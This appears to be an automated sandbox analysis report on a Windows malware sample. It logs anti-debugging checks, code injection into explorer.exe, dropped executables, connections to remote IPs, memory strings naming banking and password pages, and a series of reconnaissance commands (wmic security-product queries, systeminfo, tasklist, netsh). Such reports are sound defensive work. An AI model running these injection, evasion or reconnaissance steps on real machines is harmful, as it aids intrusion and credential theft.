Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\	Jump to behavior

Source: explorer.exe, 00000002.00000000.2095504231.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: B126.tmp.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: B126.tmp.10.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003052000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: B126.tmp.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: B126.tmp.10.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: B126.tmp.10.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: B126.tmp.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: B126.tmp.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: B126.tmp.10.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2093454201.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: B126.tmp.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: ROUTE.EXE, 00000021.00000002.3493412295.000001BF53BD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllFF
Source: explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: B126.tmp.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: FDDB.exe, 00000008.00000002.4489409357.0000021DDD8E9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fo & echo 1369111422311351951369111422\r\n\r\nHost Name: user-PC\r\nOS Name: Microsoft Windows 10 Pro\r\nOS Version: 10.0.19045 N/A Build 19045\r\nOS Manufacturer: Microsoft Corporation\r\nOS Configuration: Standalone Workstation\r\nOS Build Type: Multiprocessor Free\r\nRegistered Owner: hardz\r\nRegistered Organization: \r\nProduct ID: 00330-71388-77023-AAOEM\r\nOriginal Install Date: 03/10/2023, 10:57:18\r\nSystem Boot Time: 24/09/2023, 16:13:49\r\nSystem Manufacturer: VVO2mvF2kM2e VE\r\nSystem Model: xFgTSuDp\r\nSystem Type: x64-based PC\r\nProcessor(s): 2 Processor(s) Installed.\r\n [01]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: 9YSUS 3PKM9, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'922 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'171 MB\r\nVirtual Memory: In Use: 1'020 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: GvDH5\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.5\r\n [02]: fe80::357a:d50d:a849:be2d\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n1369111422311351951369111422\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: B126.tmp.10.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: B126.tmp.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: B126.tmp.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: B126.tmp.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: FDDB.exe, 00000008.00000002.4489924500.0000021DDF5E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: B126.tmp.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: B126.tmp.10.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: B126.tmp.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: B126.tmp.10.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: B126.tmp.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: B126.tmp.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: B126.tmp.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: B126.tmp.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 0000000A.00000003.3137125800.0000000003032000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tion PasswordVMware20,11696428655}
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: B126.tmp.10.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: B126.tmp.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2092180745.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: B126.tmp.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\9VgIkx4su0.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\9VgIkx4su0.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	System information queried: CodeIntegrityInformation	Jump to behavior

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 15_2_00191B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,

15_2_00191B17

Source: C:\Users\user\AppData\Roaming\dghchav

Code function: 38_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

38_2_0040471A

Source: C:\Windows\SysWOW64\explorer.exe

15_2_00191016

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Code function: 8_2_00007FF6DFE278EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

8_2_00007FF6DFE278EC

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00620FE3 push dword ptr fs:[00000030h]	0_2_00620FE3
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_0209092B mov eax, dword ptr fs:[00000030h]	0_2_0209092B
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_02090D90 mov eax, dword ptr fs:[00000030h]	0_2_02090D90
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_005DF31B push dword ptr fs:[00000030h]	4_2_005DF31B
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_0209092B mov eax, dword ptr fs:[00000030h]	4_2_0209092B
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_02090D90 mov eax, dword ptr fs:[00000030h]	4_2_02090D90
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_0056092B mov eax, dword ptr fs:[00000030h]	6_2_0056092B
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00560D90 mov eax, dword ptr fs:[00000030h]	6_2_00560D90
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_006BF374 push dword ptr fs:[00000030h]	6_2_006BF374
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_005E092B mov eax, dword ptr fs:[00000030h]	7_2_005E092B
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_005E0D90 mov eax, dword ptr fs:[00000030h]	7_2_005E0D90
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 7_2_0076ED24 push dword ptr fs:[00000030h]	7_2_0076ED24

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Code function: 8_2_00007FF6DFE22654 GetProcessHeap,RtlReAllocateHeap,

8_2_00007FF6DFE22654

Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040635C SetUnhandledExceptionFilter,	38_2_0040635C
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_0040471A
Source: C:\Users\user\AppData\Roaming\dghchav	Code function: 38_2_00403FC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	38_2_00403FC0
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040635C SetUnhandledExceptionFilter,	39_2_0040635C
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_0040471A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0040471A
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 39_2_00403FC0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00403FC0

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 3E40.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 187.131.253.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.164 443	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 23.145.40.162 443	Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Thread created: C:\Windows\explorer.exe EIP: 30519A8	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Thread created: unknown EIP: 11419A8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Thread created: unknown EIP: 87A1970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Thread created: unknown EIP: 2FE1970	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\explorer.exe	Memory written: PID: 6580 base: B779C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 6824 base: 7FF6747E2D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 2180 base: B779C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 4444 base: 7FF6747E2D10 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 3944 base: B779C0 value: 90	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: PID: 1976 base: 7FF6747E2D10 value: 90	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: B779C0	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		18_2_02FE10A5
Source: C:\Windows\SysWOW64\explorer.exe	Code function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe		18_2_02FE1016

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Process created: C:\Windows\System32\cmd.exe cmd	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ROUTE.EXE route print	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh firewall show state	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 path win32_operatingsystem get caption,csdversion,buildnumber,version,buildtype,countrycode,currenttimezone,installdate,lastbootuptime,locale,osarchitecture,oslanguage,osproductsuite,ostype,systemdirectory,organization,registereduser,serialnumber /format:csv			Jump to behavior

Source: explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2093256969.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2091734757.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2091336304.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 10_2_007355EB cpuid

10_2_007355EB

Source: C:\Users\user\AppData\Roaming\dghchav	Code function: GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,		38_2_004010E0
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: GetNumberFormatW,EnumCalendarInfoA,SetFileAttributesW,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,CopyFileW,GetStdHandle,GetComputerNameW,ClearCommBreak,InterlockedDecrement,EnumCalendarInfoA,GetTempPathA,_memset,CommConfigDialogW,GetVersionExW,CreateActCtxA,InterlockedIncrement,GetShortPathNameA,EnumCalendarInfoA,GetLocaleInfoA,SetVolumeMountPointA,GlobalWire,CreateEventW,		39_2_004010E0

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Roaming\dghchav

Code function: 38_2_00401360 GetNumberFormatW,CreateJobObjectW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesA,EnumDateFormatsW,CreateNamedPipeA,SetFileShortNameW,SetProcessShutdownParameters,GetTimeFormatA,GetModuleFileNameW,TlsSetValue,SetVolumeMountPointW,GetEnvironmentVariableA,SetCalendarInfoW,GetModuleFileNameW,

38_2_00401360

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Code function: 8_2_00007FF6DFE29224 GetSystemTimeAsFileTime,WaitForSingleObject,GetSystemTimeAsFileTime,TerminateProcess,WaitForSingleObject,GetExitCodeProcess,

8_2_00007FF6DFE29224

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 10_2_006E2198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

10_2_006E2198

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the windows firewall

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh firewall show state

